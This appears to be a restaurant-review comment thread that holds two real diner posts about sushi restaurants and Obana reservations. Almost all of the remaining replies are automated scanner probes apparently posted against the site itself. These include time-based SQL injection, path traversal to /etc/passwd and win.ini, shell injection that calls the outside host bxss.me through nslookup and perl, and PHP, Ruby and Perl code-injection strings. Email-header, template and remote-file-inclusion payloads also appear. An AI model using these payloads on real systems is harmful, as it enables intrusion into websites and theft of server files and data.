vmZ1jHBW'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 870=(SELECT 870 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 177=(SELECT 177 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: Eric Yu
0CCJmUGG' OR 839=(SELECT 839 FROM PG_SLEEP(15))--
re: Eric Yu
x1BAL0Cr') OR 717=(SELECT 717 FROM PG_SLEEP(15))--
re: Eric Yu
HT38FkzZ')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@3bOmD
Just revisited yesterday. Very easy to reserve for those who have been there before.
Ikura was one of the starting pieces of nigiri and it somehow felt less magical compared to the previous time.
As expected, uni and toro(esp senaka) still unbelievably good. Ajibozushi, nodoguro don with dashi added in halfway, kurumaebi don, akagai and anago were very good.
Price has not increased since pre-covid (30k omakase before tax), but resultingly the number of tsumami has decreased.
The flow has been somewhat slower, it took 2.5hrs for the whole meal.
Would still highly recommend this place for a fancy meal, but lower inclination to revisit due to the long distance from Tokyo.
re: Yee How
jgKx2nad
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+20-20-1=0+0+0+1
re: Yee How
-1 OR 3+20-20-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
OsE1IHa3'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 489=(SELECT 489 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
re: Yee How
WyADnZOC' OR 765=(SELECT 765 FROM PG_SLEEP(15))--
re: Yee How
XNL35OmY') OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: Yee How
6esuYpTD')) OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@FOZnB
re: Yee How
6pormLIR
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+484-484-1=0+0+0+1
re: Yee How
-1 OR 3+484-484-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
Sp16TXpq'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Yee How
NzYNIG0C' OR 331=(SELECT 331 FROM PG_SLEEP(15))--
re: Yee How
76TJsJKg') OR 362=(SELECT 362 FROM PG_SLEEP(15))--
re: Yee How
Yd7CVkav')) OR 700=(SELECT 700 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@MvpGO
re: Yee How
1K2gFoGeYO
re: Yee How
response.write(9971384*9458315)
re: Yee How
'+response.write(9971384*9458315)+'
re: Yee How
"+response.write(9971384*9458315)+"
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
%0abcc:074625.67-22289.67.59267.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
to@example.com>%0d%0abcc:074625.67-22290.67.59267.19990.2@bxss.me
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
echo wlwxec$()\ jxcxpy\nz^xyu||a #' &echo wlwxec$()\ jxcxpy\nz^xyu||a #|" &echo wlwxec$()\ jxcxpy\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
&echo rqgxfw$()\ bnlinn\nz^xyu||a #' &echo rqgxfw$()\ bnlinn\nz^xyu||a #|" &echo rqgxfw$()\ bnlinn\nz^xyu||a #
re: Yee How
%2fetc%2fpasswd
re: Yee How
|echo sdslgi$()\ zpcrcz\nz^xyu||a #' |echo sdslgi$()\ zpcrcz\nz^xyu||a #|" |echo sdslgi$()\ zpcrcz\nz^xyu||a #
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
(nslookup hitptecvuihnv3937e.bxss.me||perl -e "gethostbyname('hitptecvuihnv3937e.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
$(nslookup hitcprdvmwamyaccab.bxss.me||perl -e "gethostbyname('hitcprdvmwamyaccab.bxss.me')")
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&nslookup hitqonmntgach96451.bxss.me&'\"`0&nslookup hitqonmntgach96451.bxss.me&`'
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
&(nslookup hitnpdalbyolo264f9.bxss.me||perl -e "gethostbyname('hitnpdalbyolo264f9.bxss.me')")&'\"`0&(nslookup hitnpdalbyolo264f9.bxss.me||perl -e "gethostbyname('hitnpdalbyolo264f9.bxss.me')")&`'
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
|(nslookup hitouilxwfxpic4573.bxss.me||perl -e "gethostbyname('hitouilxwfxpic4573.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
`(nslookup hitjchhafhmdf40650.bxss.me||perl -e "gethostbyname('hitjchhafhmdf40650.bxss.me')")`
re: Yee How
file:///etc/passwd
re: Yee How
;(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")|(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")&(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
/WEB-INF/web.xml
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
WEB-INF/web.xml
re: Yee How
WEB-INF\web.xml
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${9999312+9999137}
re: Yee How
)
re: Yee How
!(()&&!|*|*|
re: Yee How
'.gethostbyname(lc('hitoh'.'odjmpica840d0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(72).chr(116).chr(66).'
re: Yee How
^(#$!@#$)(()))******
re: Yee How
".gethostbyname(lc("hitfn"."owfffdvjd972e.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(86).chr(119).chr(74)."
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(101).concat(68).concat(101).concat(88)+(require"socket"
Socket.gethostbyname("hituv"+"btqquevz71fea.bxss.me.")[3].to_s)+"
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(111).concat(85).concat(121).concat(69)+(require'socket'
Socket.gethostbyname('hitoo'+'jgdcwmzv563c1.bxss.me.')[3].to_s)+'
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
';print(md5(31337));$a='
re: Yee How
/etc/shells
re: Yee How
";print(md5(31337));$a="
re: Yee How
'"
re: Yee How
c:/windows/win.ini
re: Yee How
${@print(md5(31337))}
re: Yee How
<!--
re: Yee How
${@print(md5(31337))}\
re: Yee How
bxss.me
re: Yee How
'.print(md5(31337)).'
Somehow I got a reservation at Obana 6 months in advance. I have never been before.
I made a request through Pocket Concierge. Pocket Concierge told me I needed to first contact the restaurant on Instagram directly. Then after I confirmed the reservation with the restaurant, Pocket Concierge would confirm it.
I sent a message to Obana on Instagram but they never responded.
4 days later, my reservation at Obana was confirmed by Pocket Concierge. It was very strange!
I'm looking forward to my reservation in October.
re: gomaizo
mobNqAIh
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+972-972-1=0+0+0+1
re: gomaizo
-1 OR 3+972-972-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
yMwePJG7'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 923=(SELECT 923 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 889=(SELECT 889 FROM PG_SLEEP(15))--
re: gomaizo
nAHRWtbG' OR 907=(SELECT 907 FROM PG_SLEEP(15))--
re: gomaizo
w6F5d462') OR 416=(SELECT 416 FROM PG_SLEEP(15))--
re: gomaizo
r4OFXluG')) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@OUvgJ
re: gomaizo
QJUf9BKn
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+653-653-1=0+0+0+1
re: gomaizo
-1 OR 3+653-653-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
90XHBfGO'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 596=(SELECT 596 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 16=(SELECT 16 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 708=(SELECT 708 FROM PG_SLEEP(15))--
re: gomaizo
b3ddLozt' OR 484=(SELECT 484 FROM PG_SLEEP(15))--
re: gomaizo
iBVXYTtO') OR 436=(SELECT 436 FROM PG_SLEEP(15))--
re: gomaizo
ZTkUJSE1')) OR 13=(SELECT 13 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@MKMWi
re: gomaizo
1v37Lf8FeO
re: gomaizo
%0abcc:074625.67-22173.67.b52e4.19990.2@bxss.me
re: gomaizo
response.write(9741162*9748299)
re: gomaizo
to@example.com>%0d%0abcc:074625.67-22174.67.b52e4.19990.2@bxss.me
re: gomaizo
'+response.write(9741162*9748299)+'
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
"+response.write(9741162*9748299)+"
re: gomaizo
${10000315+9999173}
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
'.gethostbyname(lc('hitnx'.'qwovrmqi0708d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(79).chr(106).chr(65).'
re: gomaizo
../../../../../../../../../../../../../../../proc/version
re: gomaizo
)
re: gomaizo
".gethostbyname(lc("hitjy"."ehliufjh314f0.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(73).chr(100).chr(90)."
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: gomaizo
!(()&&!|*|*|
re: gomaizo
../../../../../../../../../../etc/passwd%00.jpg
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: gomaizo
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: gomaizo
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: gomaizo
echo hscgox$()\ cdyspg\nz^xyu||a #' &echo hscgox$()\ cdyspg\nz^xyu||a #|" &echo hscgox$()\ cdyspg\nz^xyu||a #
re: gomaizo
/etc/passwd
re: gomaizo
&echo mkydwy$()\ vojneu\nz^xyu||a #' &echo mkydwy$()\ vojneu\nz^xyu||a #|" &echo mkydwy$()\ vojneu\nz^xyu||a #
re: gomaizo
%2fetc%2fpasswd
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
|echo yrpxxi$()\ bmyzei\nz^xyu||a #' |echo yrpxxi$()\ bmyzei\nz^xyu||a #|" |echo yrpxxi$()\ bmyzei\nz^xyu||a #
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(108).concat(77).concat(109).concat(87)+(require"socket"
Socket.gethostbyname("hitwb"+"ljhoajxbec49a.bxss.me.")[3].to_s)+"
re: gomaizo
/.././.././.././.././.././.././.././../etc/./passwd%00
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
(nslookup hitipvimzevbj4e8b2.bxss.me||perl -e "gethostbyname('hitipvimzevbj4e8b2.bxss.me')")
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(112).concat(82).concat(115).concat(68)+(require'socket'
Socket.gethostbyname('hitdd'+'nkcsyqwi89efd.bxss.me.')[3].to_s)+'
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: gomaizo
$(nslookup hitvfzltnxdow63a55.bxss.me||perl -e "gethostbyname('hitvfzltnxdow63a55.bxss.me')")
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
&nslookup hituovrlwilfie3932.bxss.me&'\"`0&nslookup hituovrlwilfie3932.bxss.me&`'
re: gomaizo
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: gomaizo
http://bxss.me/t/fit.txt%3F.jpg
re: gomaizo
${@print(md5(31337))}
re: gomaizo
&(nslookup hitsnsopzslqi56624.bxss.me||perl -e "gethostbyname('hitsnsopzslqi56624.bxss.me')")&'\"`0&(nslookup hitsnsopzslqi56624.bxss.me||perl -e "gethostbyname('hitsnsopzslqi56624.bxss.me')")&`'
re: gomaizo
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: gomaizo
/etc/shells
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
